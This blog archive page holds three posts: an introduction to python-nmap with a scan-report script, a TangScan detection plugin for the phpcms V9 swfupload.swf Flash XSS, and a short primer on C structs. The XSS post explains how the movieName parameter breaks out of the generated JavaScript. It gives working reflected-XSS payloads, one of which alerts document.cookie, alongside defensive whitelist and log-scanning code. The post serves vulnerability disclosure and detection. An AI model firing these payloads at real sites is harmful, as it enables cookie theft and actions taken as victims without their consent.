Monthly archive: January 2016

nmap from python

0x01 About

Most people are familiar with nmap. nmap is a network port scanner used to scan the open network ports of computers on a network, determine which services are running on which ports, and infer which operating system the computer is running (this is also known as fingerprinting). It is one of the essential tools of a network administrator and is also used to assess the security of network systems.

Today I am sharing python-nmap, a Python module that lets Python drive the nmap scanner conveniently. It helps administrators automate scanning tasks and generate reports, and it also supports nmap's script output.

python-nmap only exposes nmap's port scanning, but its output format makes the information easy to organize.

Prerequisite: to use python-nmap you must first have nmap itself installed.

Install from PIP

pip install python-nmap

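As an added example (not code from the original post and not part of python-nmap itself), the block below turns a python-nmap scan into the kind of compact report the post mentions. The report functions work on the per-host dict that python-nmap exposes as nm[host] (keys 'hostnames', 'status', and one dict per protocol such as 'tcp', where each port maps to a dict with 'state', 'name', 'product' and 'version'), so they can be exercised offline on SAMPLE_SCAN, a constructed sample in that layout. Only run_scan() needs the nmap binary and the python-nmap package; the target range and port list passed to it are assumptions for illustration.

```python
# Added example, not code from the original post or from python-nmap.
# Builds a compact report from python-nmap's per-host result dicts.
from __future__ import print_function

# Constructed sample in python-nmap's per-host layout (TEST-NET-1 addresses).
SAMPLE_SCAN = {
    "192.0.2.10": {
        "hostnames": [{"name": "web.example.test", "type": "PTR"}],
        "status": {"state": "up", "reason": "syn-ack"},
        "tcp": {
            22: {"state": "open", "name": "ssh", "product": "OpenSSH", "version": "7.2p2"},
            80: {"state": "open", "name": "http", "product": "nginx", "version": "1.10.0"},
            443: {"state": "closed", "name": "https", "product": "", "version": ""},
        },
    },
    "192.0.2.11": {
        "hostnames": [],
        "status": {"state": "down", "reason": "no-response"},
    },
}

# Protocol keys python-nmap may attach to a host entry.
PROTOCOLS = ("tcp", "udp", "sctp", "ip")


def open_ports(host):
    """Return sorted [(port, proto, service, banner)] for ports nmap reports as open."""
    found = []
    for proto in PROTOCOLS:
        for port, info in host.get(proto, {}).items():
            if info.get("state") != "open":
                continue
            # Join product and version into one banner, skipping empty fields.
            banner = " ".join(p for p in (info.get("product", ""), info.get("version", "")) if p)
            found.append((int(port), proto, info.get("name", ""), banner))
    return sorted(found)


def hostname(host):
    """First reverse-DNS name nmap recorded for the host, or '' if none."""
    names = host.get("hostnames") or []
    return names[0].get("name", "") if names else ""


def report(scan):
    """Render one line per host plus one indented line per open port."""
    lines = []
    for addr in sorted(scan):
        host = scan[addr]
        state = host.get("status", {}).get("state", "unknown")
        name = hostname(host)
        label = addr + (" (" + name + ")" if name else "")
        lines.append("%s %s" % (label, state))
        for port, proto, service, banner in open_ports(host):
            lines.append(("  %d/%s %s %s" % (port, proto, service, banner)).rstrip())
    return lines


def run_scan(targets, ports="1-1024", arguments="-sV"):
    """Drive nmap through python-nmap and return {addr: host_dict}; needs nmap installed."""
    import nmap  # provided by 'pip install python-nmap'
    nm = nmap.PortScanner()
    nm.scan(hosts=targets, ports=ports, arguments=arguments)
    return dict((h, nm[h]) for h in nm.all_hosts())


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; swap in
    # report(run_scan("192.0.2.0/24")) to report on a real scan.
    print("\n".join(report(SAMPLE_SCAN)))
```

Because report() reads plain dicts, the same code works on nm[host] from a live PortScanner and on saved results, which makes it easy to diff two scans of the same range and spot newly opened ports.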

Continue reading: nmap from python

Tangscan plugin: phpcms V9 /swfupload.swf XSS

Recently I read the analysis in the WooYun-2014-69833 report of the Flash XSS caused by swfupload.swf and uploadify.swf. Since the affected scope is wide (the major domestic CMS vendors, including but not limited to dedecms, phpcms, cmseasy, espcms, phpyun, thinksns, 骑士人才系统, phpdisk, 国微php168, phpok, kesioncms, pageadmin, xheditor, sdcms, emlog, dtcms and so on), the hit rate should be decent, so I submitted several plugins of this type to Tangscan and am sharing the code here as well.

First, let's look at the root cause of the vulnerability:

this.movieName = root.loaderInfo.parameters.movieName;
this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");
this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");
this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");
this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");
this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");
this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");
this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");
this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");
this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");
this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");
this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");
this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");
this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");

As the code shows, movieName is read from the request parameter (root.loaderInfo.parameters.movieName) and assigned directly into a series of callback strings, and those strings are executed as JavaScript. We only need to close the preceding "], then close the curly brace } of the try..catch block, and our own JavaScript code runs, producing a reflected XSS.

Because this is a Flash XSS and the payload contains few keywords, it is not caught by browser XSS filters or most WAFs (it runs on the client side), so the impact is considerable: at the low end unauthorized operations, XSS and CSRF worms, and at the high end a direct getshell (combined with the backend getshell tricks of certain CMSes).

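The defensive counterpart to the root cause above, as an added example that is not code from the original post, from SWFUpload or from TangScan: since movieName is spliced into a JavaScript expression as an identifier, it is only safe when it contains identifier characters and can never close the "] and } that wrap it. The block applies that whitelist and runs the same check over constructed access-log lines to flag requests that abuse the parameter on the swfupload.swf path. The log lines, IP addresses and the /statics/js/swfupload/swfupload.swf path (taken from the PoC below) are constructed sample data; uploadify.swf is not covered here.

```python
# Added example, not code from the original post, SWFUpload or TangScan.
# Whitelist check for the movieName parameter plus a log scan that flags
# requests whose movieName could break out of the generated JavaScript.
import re
try:
    from urllib.parse import urlsplit, parse_qs   # Python 3
except ImportError:
    from urlparse import urlsplit, parse_qs        # Python 2

# movieName is used inside SWFUpload.instances["<movieName>"], so only
# JavaScript identifier characters are acceptable.
SAFE_MOVIE_NAME = re.compile(r"^[A-Za-z0-9_]+$")


def is_safe_movie_name(value):
    """True when value cannot close the quote, bracket or brace that wrap it."""
    return bool(value) and SAFE_MOVIE_NAME.match(value) is not None


# Constructed access-log lines in common log format, not real traffic.
# The third line carries the kind of movieName value the post describes.
SAMPLE_LOG = """\
192.0.2.5 - - [27/Jan/2016:21:20:07 +0800] "GET /statics/js/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 13045
192.0.2.5 - - [27/Jan/2016:21:20:09 +0800] "GET /index.php?m=content HTTP/1.1" 200 5120
198.51.100.7 - - [27/Jan/2016:21:21:40 +0800] "GET /statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{alert%281%29}// HTTP/1.1" 200 13045
"""

# Client IP, timestamp, method and request target from a common-log-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def flag_swfupload_requests(log_text):
    """Return [(ip, decoded movieName)] for swfupload.swf requests failing the whitelist."""
    flagged = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/swfupload.swf"):
            continue
        # parse_qs percent-decodes the values, so the check sees the real characters.
        for name in parse_qs(parts.query).get("movieName", []):
            if not is_safe_movie_name(name):
                flagged.append((m.group("ip"), name))
    return flagged


if __name__ == "__main__":
    for ip, name in flag_swfupload_requests(SAMPLE_LOG):
        print("suspicious movieName from %s: %r" % (ip, name))
```

The whitelist is the same idea as the upstream fix for this class of bug: validate the parameter before it is ever concatenated into code, rather than trying to escape it afterwards. The log scan is useful on servers that still ship the old swf, since the PoC below detects the file only by hash and says nothing about whether anyone has been probing it.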
Here is the phpcms V9 /swfupload.swf XSS PoC:

  • TangScan-ID: TS-2014-17843
#! /usr/bin/env python
# -*- coding: utf-8 -*-

import md5
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": """
            phpcms V9 /swfupload.swf XSS
            """,
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        # Fingerprint the downloaded swf so that only the known vulnerable build is reported
        return md5.new(content).hexdigest()

    def verify(self):
        # MD5 of the vulnerable swfupload.swf shipped with phpcms V9
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))

        try:
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception as e:
            self.result.error = str(e)
            return

        # A hash match means the unpatched swf is present, so report the reflected XSS
        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        # The plugin only verifies; exploitation is the verify step itself
        self.verify()


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

A Brief Discussion of Structs

0x00 Preface / Overview

What is a struct? To make data easier to reference, it is sometimes necessary to combine different pieces of data into one organic whole whose parts influence and relate to each other. Take a person's basic record, for example: number, name, sex, address (as below). In C, such a user-defined combination of items is called a structure (struct).

num  name    sex  addr
1    Ruilin  M    Shanxi

Continue reading: A Brief Discussion of Structs